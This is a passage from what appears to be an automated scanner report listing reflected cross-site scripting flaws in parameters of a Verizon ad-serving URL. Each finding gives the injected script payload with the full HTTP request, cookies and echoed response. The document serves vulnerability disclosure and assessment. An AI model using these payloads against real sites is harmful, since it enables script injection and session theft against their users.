GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=&198e7"><script>alert(1)</script>2bc9a424ec6=1 HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 02:14:07 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1402
Content-Type: text/html
Cache-Control: private
Content-Length: 1402

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
rtner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=&198e7"><script>alert(1)</script>2bc9a424ec6=1" target="_top">
...[SNIP]...

3.17. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [npa parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top

Issue detail

The value of the npa request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4037b"><script>alert(1)</script>d2c2ef8cfb7 was submitted in the npa parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=4037b"><script>alert(1)</script>d2c2ef8cfb7&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 02:13:23 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1396
Content-Type: text/html
Cache-Control: private
Content-Length: 1396

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
g/726e6f58326b7a6e4b45494141693565?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=4037b"><script>alert(1)</script>d2c2ef8cfb7&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=" target="_top">
...[SNIP]...

3.18. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [nxx parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top

Issue detail

The value of the nxx request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 14c09"><script>alert(1)</script>9bf55b7778c was submitted in the nxx parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=14c09"><script>alert(1)</script>9bf55b7778c&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 02:13:26 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1396
Content-Type: text/html
Cache-Control: private
Content-Length: 1396

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
e6f58326b7a6e4b45494141693565?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=14c09"><script>alert(1)</script>9bf55b7778c&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=" target="_top">
...[SNIP]...

3.19. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [online_backup parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top

Issue detail

The value of the online_backup request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dd800"><script>alert(1)</script>1fbf2886a4d was submitted in the online_backup parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=dd800"><script>alert(1)</script>1fbf2886a4d&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 02:13:45 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1396
Content-Type: text/html
Cache-Control: private
Content-Length: 1396

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
ty=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=dd800"><script>alert(1)</script>1fbf2886a4d&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=" target="_top">
...[SNIP]...

3.20. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [partner parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top

Issue detail

The value of the partner request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bd4b8"><script>alert(1)</script>f43c1bd4bbd was submitted in the partner parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=bd4b8"><script>alert(1)</script>f43c1bd4bbd&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 02:13:14 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1396
Content-Type: text/html
Cache-Control: private
Content-Length: 1396

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
/PlatformA_vzsur_728_2009-05_tracking/726e6f58326b7a6e4b45494141693565?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=bd4b8"><script>alert(1)</script>f43c1bd4bbd&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=" targe
...[SNIP]...

3.21. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [popcity parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top

Issue detail

The value of the popcity request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 770a4"><script>alert(1)</script>1e832059d7 was submitted in the popcity parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top?popip=174.122.23.218&popindicator=&popcity=770a4"><script>alert(1)</script>1e832059d7&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 02:12:54 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1392
Content-Type: text/html
Cache-Control: private
Content-Length: 1392

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
lick_lx.ads/vzsurround2.net/homepage/L24/128228188/Top/VDSL/PlatformA_vzsur_728_2009-05/PlatformA_vzsur_728_2009-05_tracking/726e6f58326b7a6e4b45494141693565?popip=174.122.23.218&popindicator=&popcity=770a4"><script>alert(1)</script>1e832059d7&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&au
...[SNIP]...

3.22. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [popcounty parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top

Issue detail

The value of the popcounty request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7caf7"><script>alert(1)</script>50a54869684 was submitted in the popcounty parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=7caf7"><script>alert(1)</script>50a54869684&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 02:13:01 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1396
Content-Type: text/html
Cache-Control: private
Content-Length: 1396

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
ge/L24/1187278687/Top/VDSL/PlatformA_vzsur_728_2009-05/PlatformA_vzsur_728_2009-05_tracking/726e6f58326b7a6e4b45494141693565?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=7caf7"><script>alert(1)</script>50a54869684&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email
...[SNIP]...

3.23. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [popdma parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top

Issue detail

The value of the popdma request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1da7f"><script>alert(1)</script>dd21dfded12 was submitted in the popdma parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=1da7f"><script>alert(1)</script>dd21dfded12&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 02:13:03 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1394
Content-Type: text/html
Cache-Control: private
Content-Length: 1394

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
716448215/Top/VDSL/PlatformA_vzsur_728_2009-05/PlatformA_vzsur_728_2009-05_tracking/726e6f58326b7a6e4b45494141693565?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=1da7f"><script>alert(1)</script>dd21dfded12&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhos
...[SNIP]...

3.24. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [popindicator parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top

Issue detail

The value of the popindicator request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1d09c"><script>alert(1)</script>fd46850320a was submitted in the popindicator parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top?popip=174.122.23.218&popindicator=1d09c"><script>alert(1)</script>fd46850320a&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 02:12:51 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1396
Content-Type: text/html
Cache-Control: private
Content-Length: 1396

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
ia/ads/click_lx.ads/vzsurround2.net/homepage/L24/1685458801/Top/VDSL/PlatformA_vzsur_728_2009-05/PlatformA_vzsur_728_2009-05_tracking/726e6f58326b7a6e4b45494141693565?popip=174.122.23.218&popindicator=1d09c"><script>alert(1)</script>fd46850320a&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_b
...[SNIP]...

3.25. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [popip parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top

Issue detail

The value of the popip request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7047a"><script>alert(1)</script>d1e5424609b was submitted in the popip parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top?popip=174.122.23.2187047a"><script>alert(1)</script>d1e5424609b&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 02:12:49 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1394
Content-Type: text/html
Cache-Control: private
Content-Length: 1394

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
ine.com/RealMedia/ads/click_lx.ads/vzsurround2.net/homepage/L24/744514784/Top/VDSL/PlatformA_vzsur_728_2009-05/PlatformA_vzsur_728_2009-05_tracking/726e6f58326b7a6e4b45494141693565?popip=174.122.23.2187047a"><script>alert(1)</script>d1e5424609b&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=
...[SNIP]...

3.26. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [popservice parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top

Issue detail

The value of the popservice request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 46b4c"><script>alert(1)</script>f168f1782af was submitted in the popservice parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=46b4c"><script>alert(1)</script>f168f1782af&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
